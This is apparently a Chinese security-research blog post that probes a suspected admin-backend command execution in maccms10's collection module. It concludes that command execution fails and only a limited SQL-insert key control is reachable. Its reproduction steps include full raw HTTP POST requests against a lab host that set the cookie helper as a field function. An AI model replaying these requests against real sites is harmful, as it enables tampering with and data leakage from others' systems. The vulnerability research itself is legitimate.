maccms10后台假命令执行

此处以最新版本的maccms来测试

命令执行(不可行)

最终触发点如下

后台的cj控制器的content_into方法

image-20211108114846905

接下来需要看数据是否可控

首先看函数名字

image-20211108115052434

接下来看参数

image-20211108115136184

都是从数据库中查出来的

函数是ci_node库,查看插入操作

需要找到funcs可控的地方,funcs是可控的

image-20211108124538521

但是参数值控制不了,只能取单个字符,没有实际意义

$v[‘data’]并不是数组,而是字符串

image-20211108150029370

再加上function_exists参数只能是字符串,也就导致无法调用内部类

暂时放放,虽说没有办法命令执行了,但是还是可以注入的

在不考虑后台的数据库操作,直接执行sql语句的条件下,按照常规操作,也是可以

这里有json_decode,那么插入或者更新的时候也存在encode,所以此处的表达式依旧是不可控的

但是可以设置$program_config['funcs'][$a]为cookie助手函数,就可以接受一个完全可控的传参

跟进

具体复现如下,打开后台

第一步

采集->自定义接口->添加

image-20211123152058540

成功加入数据

image-20211123152128428

第二步

采集->自定义规则->添加

image-20211123150208721

随意填写

image-20211123150300376

当然这cms还是诸多拉跨之处 参数全填了之后告诉我

image-20211123151053711

还是直接用数据包吧,缺啥加啥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /admin1.php/admin/cj/info.html HTTP/1.1
Host: 192.168.1.220:8113
Content-Length: 755
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.220:8113
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.220:8113/admin1.php/admin/cj/info.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k7gftrkljk2qub2dki0n7p08ek
Connection: close

data%5Bnodeid%5D=&data%5Bname%5D=aaa&data%5Bsourcecharset%5D=UTF-8&data%5Bmid%5D=2&data%5Bsourcetype%5D=3&data%5Bpage_base%5D=aaa&data%5Bcustomize_config%5D=bbb&data%5Bprogram_config%5D=b&urlpage1=&data%5Bpagesize_start%5D=&data%5Bpagesize_end%5D=&data%5Bpar_num%5D=&urlpage2=&urlpage3=http%3A%2F%2F127.0.0.1%3A8113%2Fa.txt&data%5Burl_contain%5D=aa&data%5Burl_except%5D=bb&data%5Burl_start%5D=cc&data%5Burl_end%5D=dd&data%5Btitle_rule%5D=&data%5Btitle_html_rule%5D=&data%5Btype_rule%5D=&data%5Btype_html_rule%5D=&data%5Bcontent_rule%5D=&data%5Bcontent_html_rule%5D=&data%5Bcontent_page_rule%5D=1&data%5Bcontent_nextpage%5D=&data%5Bcontent_page_start%5D=&data%5Bcontent_page_end%5D=&data%5Bcontent_page%5D=1&data%5Bcoll_order%5D=1&dosubmit=

成功添加数据

注意参数

  • page_base:随意
  • customize_config:随意
  • program_config:b
  • url_contain:aa
  • url_start:cc
  • url_end:dd

image-20211123160046331

前面多条测试数据,所以这里的id是5

然后取访问col_url接口

这里由于需要取访问设置的地址,所以需要在a.txt中配置数据

1
cc<a href="http://127.0.0.1:8113/aa.txt">bbb</a>dd

直接访问

http://127.0.0.1:8113/admin1.php/admin/cj/col_url?id=5

image-20211123164407554

会在数据库成功添加数据

但是由于不存在data,所以这并不是我们想要的

image-20211123164458943

第三步

更新表

在bb.txt中写入b,其实随便写

image-20211123165626846

然后数据添加成功

image-20211123165651429

第四步

更新program_config的值

直接访问

1
http://192.168.1.220:8113/admin1.php/admin/cj/program?id=5

image-20211123170647210

这将是一个体力活

再次查看源码发现vod_lang这个参数是没有经过二次过滤的

方法中全部参数存在二次过滤

image-20211123175642017

但是需要e的配置,从左侧也可以看到只有f,g

修改program_config数据包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /admin1.php/admin/cj/program?id=5 HTTP/1.1
Host: 192.168.1.220:8113
Content-Length: 5864
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.220:8113
Referer: http://192.168.1.220:8113/admin1.php/admin/cj/program?id=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k7gftrkljk2qub2dki0n7p08ek
Connection: close

id=5&model_field%5B0%5D=vod_id&node_field%5B0%5D=title&funcs%5B0%5D=&model_field%5B1%5D=type_id&node_field%5B1%5D=title&funcs%5B1%5D=&model_field%5B2%5D=type_id_1&node_field%5B2%5D=title&funcs%5B2%5D=&model_field%5B3%5D=group_id&node_field%5B3%5D=title&funcs%5B3%5D=&model_field%5B4%5D=vod_name&node_field%5B4%5D=title&funcs%5B4%5D=&model_field%5B5%5D=vod_sub&node_field%5B5%5D=title&funcs%5B5%5D=&model_field%5B6%5D=vod_en&node_field%5B6%5D=title&funcs%5B6%5D=&model_field%5B7%5D=vod_status&node_field%5B7%5D=title&funcs%5B7%5D=&model_field%5B8%5D=vod_letter&node_field%5B8%5D=title&funcs%5B8%5D=&model_field%5B9%5D=vod_color&node_field%5B9%5D=title&funcs%5B9%5D=&model_field%5B10%5D=vod_tag&node_field%5B10%5D=title&funcs%5B10%5D=&model_field%5B11%5D=vod_class&node_field%5B11%5D=title&funcs%5B11%5D=&model_field%5B12%5D=vod_pic&node_field%5B12%5D=title&funcs%5B12%5D=&model_field%5B13%5D=vod_pic_thumb&node_field%5B13%5D=title&funcs%5B13%5D=&model_field%5B14%5D=vod_pic_slide&node_field%5B14%5D=title&funcs%5B14%5D=&model_field%5B15%5D=vod_pic_screenshot&node_field%5B15%5D=title&funcs%5B15%5D=&model_field%5B16%5D=vod_actor&node_field%5B16%5D=title&funcs%5B16%5D=&model_field%5B17%5D=vod_director&node_field%5B17%5D=title&funcs%5B17%5D=&model_field%5B18%5D=vod_writer&node_field%5B18%5D=title&funcs%5B18%5D=&model_field%5B19%5D=vod_behind&node_field%5B19%5D=title&funcs%5B19%5D=&model_field%5B20%5D=vod_blurb&node_field%5B20%5D=title&funcs%5B20%5D=&model_field%5B21%5D=vod_remarks&node_field%5B21%5D=title&funcs%5B21%5D=&model_field%5B22%5D=vod_pubdate&node_field%5B22%5D=title&funcs%5B22%5D=&model_field%5B23%5D=vod_total&node_field%5B23%5D=title&funcs%5B23%5D=&model_field%5B24%5D=vod_serial&node_field%5B24%5D=title&funcs%5B24%5D=&model_field%5B25%5D=vod_tv&node_field%5B25%5D=title&funcs%5B25%5D=&model_field%5B26%5D=vod_weekday&node_field%5B26%5D=title&funcs%5B26%5D=&model_field%5B27%5D=vod_area&node_field%5B27%5D=title&funcs%5B27%5D=&model_field%5B28%5D=vod_lang&node_field%5B28%5D=title&funcs%5B28%5D=cookie&model_field%5B29%5D=vod_year&node_field%5B29%5D=title&funcs%5B29%5D=&model_field%5B30%5D=vod_version&node_field%5B30%5D=title&funcs%5B30%5D=&model_field%5B31%5D=vod_state&node_field%5B31%5D=title&funcs%5B31%5D=&model_field%5B32%5D=vod_author&node_field%5B32%5D=title&funcs%5B32%5D=&model_field%5B33%5D=vod_jumpurl&node_field%5B33%5D=title&funcs%5B33%5D=&model_field%5B34%5D=vod_tpl&node_field%5B34%5D=title&funcs%5B34%5D=&model_field%5B35%5D=vod_tpl_play&node_field%5B35%5D=title&funcs%5B35%5D=&model_field%5B36%5D=vod_tpl_down&node_field%5B36%5D=title&funcs%5B36%5D=&model_field%5B37%5D=vod_isend&node_field%5B37%5D=title&funcs%5B37%5D=&model_field%5B38%5D=vod_lock&node_field%5B38%5D=title&funcs%5B38%5D=&model_field%5B39%5D=vod_level&node_field%5B39%5D=title&funcs%5B39%5D=&model_field%5B40%5D=vod_copyright&node_field%5B40%5D=title&funcs%5B40%5D=&model_field%5B41%5D=vod_points&node_field%5B41%5D=title&funcs%5B41%5D=&model_field%5B42%5D=vod_points_play&node_field%5B42%5D=title&funcs%5B42%5D=&model_field%5B43%5D=vod_points_down&node_field%5B43%5D=title&funcs%5B43%5D=&model_field%5B44%5D=vod_hits&node_field%5B44%5D=title&funcs%5B44%5D=&model_field%5B45%5D=vod_hits_day&node_field%5B45%5D=title&funcs%5B45%5D=&model_field%5B46%5D=vod_hits_week&node_field%5B46%5D=title&funcs%5B46%5D=&model_field%5B47%5D=vod_hits_month&node_field%5B47%5D=title&funcs%5B47%5D=&model_field%5B48%5D=vod_duration&node_field%5B48%5D=title&funcs%5B48%5D=&model_field%5B49%5D=vod_up&node_field%5B49%5D=title&funcs%5B49%5D=&model_field%5B50%5D=vod_down&node_field%5B50%5D=title&funcs%5B50%5D=&model_field%5B51%5D=vod_score&node_field%5B51%5D=title&funcs%5B51%5D=&model_field%5B52%5D=vod_score_all&node_field%5B52%5D=title&funcs%5B52%5D=&model_field%5B53%5D=vod_score_num&node_field%5B53%5D=title&funcs%5B53%5D=&model_field%5B54%5D=vod_time&node_field%5B54%5D=title&funcs%5B54%5D=&model_field%5B55%5D=vod_time_add&node_field%5B55%5D=title&funcs%5B55%5D=&model_field%5B56%5D=vod_time_hits&node_field%5B56%5D=title&funcs%5B56%5D=&model_field%5B57%5D=vod_time_make&node_field%5B57%5D=title&funcs%5B57%5D=&model_field%5B58%5D=vod_trysee&node_field%5B58%5D=title&funcs%5B58%5D=&model_field%5B59%5D=vod_douban_id&node_field%5B59%5D=title&funcs%5B59%5D=&model_field%5B60%5D=vod_douban_score&node_field%5B60%5D=title&funcs%5B60%5D=&model_field%5B61%5D=vod_reurl&node_field%5B61%5D=title&funcs%5B61%5D=&model_field%5B62%5D=vod_rel_vod&node_field%5B62%5D=title&funcs%5B62%5D=&model_field%5B63%5D=vod_rel_art&node_field%5B63%5D=title&funcs%5B63%5D=&model_field%5B64%5D=vod_pwd&node_field%5B64%5D=title&funcs%5B64%5D=&model_field%5B65%5D=vod_pwd_url&node_field%5B65%5D=title&funcs%5B65%5D=&model_field%5B66%5D=vod_pwd_play&node_field%5B66%5D=title&funcs%5B66%5D=&model_field%5B67%5D=vod_pwd_play_url&node_field%5B67%5D=title&funcs%5B67%5D=&model_field%5B68%5D=vod_pwd_down&node_field%5B68%5D=title&funcs%5B68%5D=&model_field%5B69%5D=vod_pwd_down_url&node_field%5B69%5D=title&funcs%5B69%5D=&model_field%5B70%5D=vod_content&node_field%5B70%5D=title&funcs%5B70%5D=&model_field%5B71%5D=vod_play_from&node_field%5B71%5D=title&funcs%5B71%5D=&model_field%5B72%5D=vod_play_server&node_field%5B72%5D=title&funcs%5B72%5D=&model_field%5B73%5D=vod_play_note&node_field%5B73%5D=title&funcs%5B73%5D=&model_field%5B74%5D=vod_play_url&node_field%5B74%5D=title&funcs%5B74%5D=&model_field%5B75%5D=vod_down_from&node_field%5B75%5D=title&funcs%5B75%5D=&model_field%5B76%5D=vod_down_server&node_field%5B76%5D=title&funcs%5B76%5D=&model_field%5B77%5D=vod_down_note&node_field%5B77%5D=title&funcs%5B77%5D=&model_field%5B78%5D=vod_down_url&node_field%5B78%5D=title&funcs%5B78%5D=&model_field%5B79%5D=vod_plot&node_field%5B79%5D=title&funcs%5B79%5D=&model_field%5B80%5D=vod_plot_name&node_field%5B80%5D=type&funcs%5B80%5D=&model_field%5B81%5D=vod_plot_detail&node_field%5B81%5D=content&funcs%5B81%5D=

第五步

修改配置

image-20211123173416205

成功修改

image-20211123173511497

但是最后依然只是在insert方法中存在一个可控的key

image-20211123181855455

根据之前的研究

可以报一些数据库用户及名字 没啥用,不跟了